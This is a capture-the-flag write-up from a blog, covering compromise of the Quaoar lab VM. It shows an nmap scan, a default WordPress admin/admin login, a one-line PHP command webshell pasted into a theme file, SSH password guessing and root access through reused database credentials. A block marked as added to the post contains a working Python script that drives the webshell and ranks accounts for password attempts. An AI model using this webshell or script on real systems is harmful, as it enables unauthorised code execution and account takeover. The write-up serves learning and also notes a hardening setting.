WWRDPLDN

This shall be a record of my escapades into the world of ones and zeros.

Quaoar

wwrdpldnadmin | 17 March, 2017 14:05

This is the first pen test write-up I have published. I have been pen testing for about three years as a hobby and I enjoy it immensely. Part of pen testing is writing reports that can be handed to the people who commissioned the test, so I have decided to start practicing that art. I also decided to start with an easy target so that I could focus on the report rather than on the actual penetration of the machine.

 

I chose Quaoar for this purpose as it explicitly stated it was easy.

I launched the OVA in VMware Player and it presented me with instructions and the IP address, 192.168.255.137. The first thing I did was launch Zenmap... yes, Zenmap. I hear you groan. I like GUIs... bite me.

#nmap -T4 -A -v 192.168.255.137

Zenmap spat out the following:


Discovered open port 110/tcp on 192.168.255.137
Discovered open port 139/tcp on 192.168.255.137
Discovered open port 22/tcp on 192.168.255.137
Discovered open port 995/tcp on 192.168.255.137
Discovered open port 53/tcp on 192.168.255.137
Discovered open port 445/tcp on 192.168.255.137
Discovered open port 143/tcp on 192.168.255.137
Discovered open port 80/tcp on 192.168.255.137
Discovered open port 993/tcp on 192.168.255.137

Since I already knew this was supposed to be easy and I wanted to focus on the report, I went straight to DirBuster without even opening the web page.

I ran DirBuster against http://192.168.255.137:80 and immediately found WordPress. Anyone who has ever done anything with WordPress knows it has always been plagued with vulnerabilities. Again, knowing this was supposed to be easy, I went straight to the login page and found the username/password set to admin/admin.

A quick Google search turns up a plethora of easy techniques for a WordPress control panel once you have an authenticated admin, namely editing the theme template files directly from the dashboard.

 

I navigate to the Twenty Thirteen theme in the editor, select 404.php, delete all of its code and paste in

<?php
system($_GET["cmd"]);
?>

I save the file, browse to it and issue a cat against /etc/passwd:

http://192.168.255.137/wordpress/wp-content/themes/twentythirteen/404.php?cmd=cat%20/etc/passwd

/etc/passwd output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
colord:x:104:109:colord colour management daemon,,,:/var/lib/colord:/bin/false
whoopsie:x:105:112::/nonexistent:/bin/false
avahi:x:106:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
bind:x:107:117::/var/cache/bind:/bin/false
postfix:x:108:118::/var/spool/postfix:/bin/false
dovecot:x:109:120:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:110:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:111:121::/var/lib/landscape:/bin/false
libvirt-qemu:x:112:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:113:123:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:115:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
tomcat6:x:116:126::/usr/share/tomcat6:/bin/false
wpadmin:x:1001:1001::/home/wpadmin:/bin/sh

I see that the only regular user other than root is wpadmin. I recall SSH was open on port 22. I think about brute-forcing wpadmin, but I remember, once again, that this is supposed to be easy, so before brute-forcing I try to SSH in as wpadmin.
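The two steps above, driving the 404.php command shell and picking login candidates out of /etc/passwd, as an added example that is not part of the original post. It assumes the theme file contains exactly the `<?php system($_GET["cmd"]); ?>` pasted above, so the response body is the command's stdout; the base URL is a parameter, and the embedded passwd text is a trimmed copy of the listing above so the triage runs offline.

```python
"""Added example (not from the original post): drive the 404.php command
shell from the theme-editor step and triage the /etc/passwd it returns.

Assumptions: the theme file is exactly `<?php system($_GET["cmd"]); ?>`
as pasted above, so the response body is the command's stdout; nothing
below is hard-coded to the lab host.
"""
from urllib.parse import quote
from urllib.request import urlopen

# Shells that cannot be used for an interactive login.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}


def build_cmd_url(shell_url: str, cmd: str) -> str:
    """URL that runs `cmd` through the webshell.

    quote() with safe="/" yields the same form as the hand-typed URL in
    the post (cat%20/etc/passwd) while still escaping '&', ';', '|' and
    quotes, so pipelines and arguments reach system() intact.
    """
    return f"{shell_url}?cmd={quote(cmd, safe='/')}"


def run_cmd(shell_url: str, cmd: str, timeout: float = 10.0) -> str:
    """Send `cmd` and return the raw response body (system() echoes stdout)."""
    with urlopen(build_cmd_url(shell_url, cmd), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def parse_passwd(passwd_text: str):
    """Yield (name, uid, home, shell) for every well-formed passwd line."""
    for raw in passwd_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, _gid, _gecos, home, shell = fields
        yield name, int(uid), home, shell


def login_candidates(passwd_text: str):
    """Accounts worth an SSH password guess: root plus ordinary users.

    Debian/Ubuntu hand out UIDs 1000-59999 to people; 65534 is nobody.
    Shell alone is not a usable filter on this box because most service
    accounts still carry /bin/sh, which is why the post keys on the user
    list rather than on shells.
    """
    return [
        {"name": n, "uid": u, "home": h, "shell": s}
        for n, u, h, s in parse_passwd(passwd_text)
        if s not in NOLOGIN_SHELLS and (u == 0 or 1000 <= u < 60000)
    ]


def service_accounts_with_bash(passwd_text: str):
    """Service accounts (UID 1-999) given a full bash shell rather than the
    default /bin/sh or /bin/false; worth a second look because someone set
    them up for interactive use (postgres on this box)."""
    return [n for n, u, _h, s in parse_passwd(passwd_text)
            if 1 <= u < 1000 and s.endswith("bash")]


# Trimmed copy of the /etc/passwd listing above, embedded so the triage
# runs offline; run_cmd(shell_url, "cat /etc/passwd") returns the full one.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:115:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
tomcat6:x:116:126::/usr/share/tomcat6:/bin/false
wpadmin:x:1001:1001::/home/wpadmin:/bin/sh
"""

if __name__ == "__main__":
    url = "http://192.168.255.137/wordpress/wp-content/themes/twentythirteen/404.php"
    print(build_cmd_url(url, "cat /etc/passwd"))
    for acct in login_candidates(SAMPLE_PASSWD):
        print("try ssh as", acct["name"], "shell", acct["shell"])
    print("service accounts with bash:", service_accounts_with_bash(SAMPLE_PASSWD))
```

The finding to write up here is not the webshell itself but what made it possible: a default admin/admin login and a dashboard that lets an administrator edit PHP files that the web server then executes. Setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php turns the theme and plugin editor off, so an admin credential alone no longer yields code execution.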

$ ssh wpadmin@192.168.255.137
(using wpadmin as the password)

Success! Wow this one really is easy.

The first flag was in the wpadmin home directory.
$ ls
flag.txt
$ cat flag.txt   
2bafe61f03117ac66a73c3c514de796e

I switched to a bash shell just to make things easier (wpadmin's login shell is /bin/sh):
$ /bin/bash
wpadmin@Quaoar:/$

I verified that wpadmin has no sudo privileges, so I grab some information on the system.

wpadmin@Quaoar:/$ cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
wpadmin@Quaoar:/$ cat /proc/version
Linux version 3.2.0-23-generic-pae (buildd@palmer) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu4) ) #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012

I tried a couple of privilege escalations, but the wpadmin user's privileges were too low to execute them. I began searching through folders for anything useful. When I got to the www folder I found a folder called uploads. It had shown up in the DirBuster scan too, but I had put it in the back of my mind. I open the folder and find a config.php file there. The file holds the connection string for the database, with the connection credentials in clear text. The username/password is root/rootpassword! I start wondering about digging through the database, but then I realize... could this actually be the password for the root user?

I SSH'd back into the box as root:
$ ssh root@192.168.255.137
root@192.168.255.137's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Mar 16 13:25:52 EDT 2017

  System load:  0.01              Processes:             106
  Usage of /:   30.1% of 7.21GB   Users logged in:       1
  Memory usage: 38%               IP address for eth0:   192.168.255.137
  Swap usage:   0%                IP address for virbr0: 192.168.122.1

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#

Success! Again, wow, that was easy!


root@Quaoar:~# ls
flag.txt  vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

Now, there is supposed to be a third flag. I searched for various terms and came up wanting. I wouldn't expect this third flag to be hard to find, given that everything else has been ridiculously easy. I looked through a couple of walkthroughs from others and see that no one else is finding it either; in fact only a couple even mention it. I have sent an email asking for verification that there is a third flag and have not received an answer as of this posting. I will update this post if I receive confirmation that it exists, and again if I manage to find it.

 

Cheers!
